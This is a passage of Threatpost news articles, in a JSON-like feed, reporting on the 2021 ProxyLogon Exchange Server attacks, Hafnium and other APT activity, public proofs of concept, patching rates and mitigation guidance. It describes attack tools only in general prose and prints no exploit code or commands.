[F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised 